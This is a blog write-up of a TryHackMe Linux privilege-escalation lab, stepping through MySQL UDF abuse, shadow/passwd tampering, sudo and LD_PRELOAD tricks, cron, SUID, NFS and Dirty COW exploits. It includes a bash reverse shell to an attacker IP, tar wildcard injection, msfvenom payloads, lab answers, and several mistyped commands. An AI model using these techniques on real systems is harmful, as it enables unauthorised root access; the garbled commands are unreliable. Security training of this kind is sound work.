Linux Privilege Escalation

 
29.jpg
 

The link for this lab is located here: https://tryhackme.com/room/linuxprivesc


In this room, we will walk through a variety of Linux Privilege Escalation techniques - ranging from weak file permissions and cron jobs to environment variables and SUID executables


ezgif.com-gif-maker.png

Task 2 - Service Exploits

The MySQL service is running as root and the “root” user for the service does NOT have a password assigned. To exploit this, we can use this that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service. To learn more about UDFs, you can read about them here.

First step to run this exploit is to change into the “/home/user/tools/mysql-udf” directory. Once there, we have to compile the “raptor_udf2.c” exploit code using the following commands:

  • gcc -g -c raptor_udf2.c -fPIC

  • gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

After compiling, we connect to the MySQL service as the root user with no password.

  • mysql -u root

mysql.png

Once in, execute the following commands on the MySQL shell to create a User Defined Function (UDF) “do_system” using our compiled exploit

  • use mysql;

  • create table foo(line blob);

  • insert into foo values(load_fule(‘/home/raptor/raptor_udf2.so’));

  • select * from foo into dumpfile ‘/usr/lib/raptor_udf2.so’;

  • create function do_system returns integer soname ‘raptor_udf2.so’;

mysql commands.png

Once completed, use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission:

  • select do_system(cp ‘/bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash’);

bashsql.png

Then, exit out of the MySQL shell and run the “/tmp/rootbash” executable with “-p” to gain a shell running with root privileges. 

root1.png

Once finished, remove the /tmp/rootbash executable and exit out of the root shell before continuing.


3.jpg

Task 3 - Weak File Permissions - Readable /etc/shadow

The /etc/shadow file contains user password hashes and is usually readable only by the root user. In this room, the “/etc/shadow” file is world-readable.

shadowperms.png

To view the contents of the /etc/shadow, simply cat it out.

shadow.png

Each line of the file represents a user. A user’s password hash can be found between the first and second colons (:) of each line.

First, save the root user’s hash to a file called hash.txt locally and then use John the Ripper to crack it using the rockyou.txt wordlist

crack.png

Once the password is cracked, simply switch to the root user - remember to exit out of root before continuing.

root.png

Questions

Q1: What is the root user's password hash? A: $6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0

Q2: What hashing algorithm was used to produce the root user's password hash? A: sha512crypt

Q3: What is the root user's password? A: password123

4.png

Task 4 - Weak File Permissions - Writable /etc/shadow

You should have also noticed that the /etc/shadow file was also world-writable.

shadowperms.png

To generate a new password hash to replace an already existing user’s into this file, you can use the “mkpasswd -m sha-512 newpassword123” command.

Once created, simply edit the /etc/shadow file and replace the original root user’s password hash with the one you just generated. 

newp.png

Once completed, simply switch to the root user using the new password - remember to exit out of the root shell afterwards.

root2.png

5.jpg

Task 5 - Weak File Permissions - Writable /etc/passwd

The /etc/passwd file contains information about user accounts. Typically, it is world-readable but usually only writable by the root user. Historically, the /etc/passwd DID contain user password hashes and some Linux versions still allow password hashes to be stored there.

passperms.png

To generate a new password hash, use the “openssl passwd pass456

newpass.png

Once generated, edit the /etc/passwd file and place the generated password hash between the first and second colon of the root user’s row.

rootp.png

Next, try switching to the root user using the new password.

root3.png

Alternatively, you can copy the root user’s row and append it to the bottom of the file, changing the first instance of the word “root” to “newroot” and placing the generated password hash between the first and second colon.

Then, try switching to the “newroot” user.

Questions

Q1: Run the "id" command as the "newroot" user. What is the result? A: uid=0(root) gid=0(root) groups=0(root)

6.jpg

Task 6 - Sudo - Shell Escape Sequences

To list the programs which sudo allows you to run, use the “sudo -l” command

sudol.png

Next, if a program or script or service is listed, look through GTFOBins and search for the program name. If the program is listed with “sudo” as a function, you can use it to elevate privileges - usually via an escape sequence.

There is one program that does NOT have any entry on GTFOBins which is apache2.

For this section, choose a program from the list available after running “sudo -l” and try to gain a root shell following instructions from GTFOBins.

I chose to use the “vim” program.

vim.png

Using the first line, I simply spawned a Bash shell running as root

root4.png

I also tried using the “iftop” sudo vulnerability via the following

iftop.png

Questions

Q1: How many programs is "user" alowed to run via sudo? A: 11

Q2: One program on the list does NOT have a shell escape sequence on GTFOBins. Which is it? A: Apache2

7.jpg

Task 7 - Sudo - Environment Variables

Sudo can be configured to inherit certain environment variables from the user’s environment. To check which environment variables are inherited use the “sudo -l” command and look for the “env_keep” option.

envkeep.png

LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user’s environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

First thing we can do is create a shared object using the code located at /home/user/tools/sudo/preload.c

  • gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

preload.png

Next, run one of the programs you are allowed via sudo, while setting the LD_PRELOAD environment variable to the full path of the new shared object.

  • sudo LD_PRELOAD=/tmp/preload.so [program-name]

A root shell should spawn.

For the second method using LD_LIBRARY_PATH, you can first run ldd against the apache2 program file to see which shared libraries are used by the program

  • ldd /usr/sbin/apache2

Next, create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:

  • gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

lib.png

Finally, run apache2 using sudo while setting the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object).

  • sudo LD_LIBRARY_PATH=/tmp apache2

root6.png

8.jpg

Task 8 - Cron Jobs - File Permissions

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

To view the contents, simply cat it out.

There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.

2jobs.png

To find what the full path of overwrite.sh is, you can run “locate overwrite.sh

over.png

Looking at the permissions of each file, you can see that overwrite.sh is world-writable. This means we can overwrite the contents of this file to spawn a shell when it gets ran the next minute.

world.png

To do this, we can change the contents of the overwrite.sh file with the following:

  • #!/bin/bash

  • bash -i >& /dev/tcp/10.11.3.112/4444 0>&1

bashshell.png

Once saved, run a netcat listener on your local machine to catch the reverse shell and wait for the cron job to run.

netcat.png

After a minute or less, a root shell should connect back to your netcat listener.

root7.png

9.jpg

Task 9 - Cron Jobs - PATH Environment Variables

Once again, viewing the system-wide crontab reveals that the PATH variable starts with /home/user which is our user’s home directory.

cron2.png

With this information, we can create a file called overwrite.sh in our home directory with the following contents:

  • #!/bin/bash

  • cp /bin/bash /tmp/rootbash

  • chmod +xs /tmp/rootbash

nano.png

Be sure to make the home/user/overwrite.sh file executable.

overwrite.png

Then, wait for the cron job to run. After it has ran, try running the “/tmp/rootbash” command with “-p” to gain a shell running with root privileges.

root8.png

Afterwards, remove the modified code and the /tmp/rootbash executable and exit out of the root shell.

Questions

Q1: What is the value of the PATH variable in /etc/crontab? A: /home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

10.jpg

Task 10 - Cron Jobs - Wildcards

Looking at the contents of the other cron job script, we note that the tar command is being run with a wildcard (*) in our home directory.

Taking a look at the GTFOBins page for tar, we can see that tar has command line options that let you run other commands as part of a checkpoint feature.

Using msfvenom, we can generate a reverse shell ELF binary.

elf.png

Once created, we can transfer the shell.elf file to /home/user on the target machine either using scp, or hosting a web server and using wget. Once on the machine, you can give it executable permissions.

python.png
wget.png
chmod.png

Afterwards, create two files in /home/user:

  • touch /home/user/--checkpoint=1

  • touch /home/user/--checkpoint-action=exec=shell.elf

touch.png

When the tar command runs via the cron job, the wildcard (*) will expand to include these files. Since their file names are valid tar command line options, tar will recognize them as such and treat them as command line options rather than filenames.

To catch the shell, you need to set a netcat listener on your local machine on the same port as specified in msfvenom. After a minute, you should receive a root shell back.

root9.png

Remember to exit the root shell and delete all the files you created.


12.jpg

Task 11 - SUID/SGID Executables - Known Exploits

Another useful thing we can do is search for all SUID/SGID executables on the target using the find command with the following parameters:

  • find / -type f \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

find.png

Note that /usr/sbin/exim-4.84-3 appears in the results. Searching for an exploit for this version of exim reveals the following exploit.

cve.png

A local privilege escalation exploit matching this version of exim exactly. A copy can already be found at /home/user/tools/suid/exim/cve-2016-1531.sh.

exim.png

Simply run the exploit to gain a root shell.

root10.png

13.jpg

Task 12 - SUID/SGID Executables - Shared Object Injection

The /usr/local/bin/suid-so SUID executable is vulnerable to Shared Object Injection

First, execute the file and note that it displays a progress bar before exiting. 

Run “strace” on the file and search the output for open/access calles and for “no such file” errors:

  • strace /usr/local/bin/suid-so 2>&1 | grep -iE “open|access|no such file”

grep.png

Looking at the results, the executable tries to load the /home/user/.config/libcalc.so shared object within our home directory but it cannot be found. 

To exploit this, first we create the .config directory in our home directory

The example shared object code can be found at /home/user/tools/suid/libcalc.so. It simply spawns a bash shell. 

To compile the code into a shared object at the location the suid-so executable is looking at, use the following:

  • gcc -shared -fPIC -o /home/usr/.config/libcalc.so /home/user/tools/suid/libcalc.so

creation.png

Once compiled, execute the suid-so executable again and note that this time, instead of a progress bar, we get a root shell.

root11.png

14.jpg

Task 13 - SUID/SGID Executables - Environment Variables

The /usr/local/bin/suid-env executable can be exploited due to it inheriting the user’s PATH environment variable and attempting to execute programs without specifying an absolute path.

First, execute the file and note that it seems to be trying to start the apache2 web server:

  • /usr/local/bin/suid-env

suidenv.png

Running strings on the file to look for strings of printable characters reveals one line - service apache2 start.

start.png

This suggests that the service executable is being called to start the web server, however the full path of the executable (/usr/sbin/service) is not being used.

We can compile the code located at /home/user/tools/suid/service.c into an executable called service - the code simply spawns a Bash shell

  • gcc -o service /home/user/tools/suid/service.c

Then, we can prepend the current directory (or where the new service executable is located) to the PATH variable and run the suid-env executable to gain a root shell

  • PATH=.:$PATH /usr/local/bin/suid-env

compile.png

15.jpg

Task 14 - SUID/SGID Executables - Abusing Shell Features #1

The /usr/local/bin/suid-env2 executable is identical to /usr/local/bin/suid-env except that it uses the absolute path of the service executable (/usr/bin/service) to start the apache2 web server. 

First, we can verify this with the strings command.

  • strings /usr/local/bin/suid-env2

strings.png

In BASH versions <4.2-048, it is possible to define shell functions with names that resemble file paths and then export those functions so that they are used instead of any actual executable at that file path.

version.png

To do this, we first create a BASH function with the name “/usr/sbin/service” that executes a new BASH shell and then export the function.

  • function /usr/sbin/service { /bin/bash -p; }

  • export -f /usr/sbin/service

function.png

Once completed, run the suid-env2 executable to gain a root shell.

root12.png

16.jpg

Task 15 - SUID/SGID Executables - Abusing Shell Features #2

Before starting here, this privilege escalation technique will NOT work on BASH versions 4.4 and above. 

When in debugging mode, BASH uses the environment variables PS4 to display an extra prompt for debugging statements.

Running the /usr/local/bin/suid-env2 executable with BASH debugging enabled and the PS4 variable set to an embedded command which creates a SUID version of /bin/bash:

  • env -i SHELLOPTS=xtrace PS4=#$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)’    /usr/local/bin/suid-env2

debugging.png

Then, run the /tmp/rootbash executable with “-p” to gain a shell running with root privileges.

root13.png

Remember to remove the /tmp/rootbash executable and exit out of the elevated shell before continuing.


17.jpg

Task 16 - Passwords and Keys - History Files

If a user accidentally types their password on the command line instead of into a password prompt, it may get recorded in a history file. To list all the hidden history files in the user’s home directory, use the following:

  • cat ~/.*history | less

history.png

Note that the user has tried to connect to a MySQL server at some point using the root username and a password submitted via the command line - there is NO space between the “-p” option and the password

Simply switch to the root user using the password found.

su.png

Questions

Q1: What is the full mysql command the user executed? A: mysql -h somehost.local -uroot -ppassword123

18.jpg

Task 17 - Passwords & Keys - Config Files

Configuration files often contain passwords in plaintext or other reversible formats. By listing the contents of the user’s home directory, we see a .ovpn configuration file.

ovpn.png

Viewing the contents of this file we see a reference to another location where the root user’s credentials can be found. 

auth.png

Viewing the new file, we see the credentials. Now, simply switch to the root user using the credentials found.

rp.png
switch.png

Questions

Q1: What file did you find the root user's credentials in? A: /etc/openvpn/auth.txt

20.jpg

Task 18 - Passwords & Keys - SSH Keys

Sometimes users make backups of important files but fail to secure them with the correct permissions. Looking at the hidden files in the system root, we find a hidden directory called “.ssh” - this normally contains SSH keys used for remote authentication.

hidssh.png

Looking inside, we see that there is a world-readable file called root_key. Further inspection of this file should indicate it is a private SSH key - the name of the file suggests it is for the root user.

rootkey.png

Now that we have this, we can copy the key to our local machine and give it the correct permissions (600) before using it.

scp.png
600.png

Once configured, simply the use key to login to the target as the root account.

sshroot.png

27.jpg

Task 19 - NFS

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the “nobody” user.

To check the NFS share configuration, run the following:

  • cat /etc/exports

exports.png

Notice that the /tmp share has root squashing disabled. Because of this, on our local machine we can create a mount point and mount the /tmp share.

  • mkdir /tmp/nfs

  • mount -o rw,vers=2 [IP]:/tmp /tmp/nfs

nfs.png

Still on our local machine, we can generate a payload using msfvenom and save it to the mounted share - this payload simply calls /bin/bash.

  • msfvenom -p linux/x86/exec CMD=”/bin/bash -p” -f elf -o /tmp/nfs/shell.elf

shellelf.png

Finally, make the file executable and set the SUID permissions:

  • chmod +xs /tmp/nfs/shell.elf

sudochmod.png

As a final step, back on the target machine, execute the file to gain a root shell.

exec.png

Questions

Q1: What is the name of the option that disables root squashing? A: no_root_squash

24.jpg

Task 20 - Kernel Exploits

Kernel exploits can leave the system in an unstable state - you should ONLY run them as a last resort. 

For this, run the Linux Exploit Suggester 2 tool to identify potential kernel exploits on the current system.

  • perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl

perl.png

The popular Linux kernel exploit “Dirty COW” is listed. The exploit code for Dirty Cow can be found “/home/user/tools/kernel-exploits/dirtycow/c0w.c”.

It replaces the SUID file /usr/bin/passwd with one that spawns a shell (a backup of /usr/bin/passwd is made at /tmp/bak)

To compile the code and run it, use the following:

  • gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w

  • ./c0w

cow.png

Once the exploit completes, run /usr/bin/passwd to get a root shell.

root14.png

Remember to restore the original /usr/bin/passwd file and exit the root shell.

cleanup.png

28.jpg

Task 21 - Privilege Escalation Scripts

Several tools have been written which help find potential privilege escalations on Linux. Three of these tools have been included on the target in /home/user/tools/privesc-scripts.

Experiment with these tools - running them with different options. Run each script yourselves and look through them. I will provide a basic screenshot of each.

LinEnum

linenum.png

LinPeas

linpeas.png

LSE

lse.png
Previous
Previous

Vulnversity - TryHackMe Room

Next
Next

Common Linux Privilege Escalation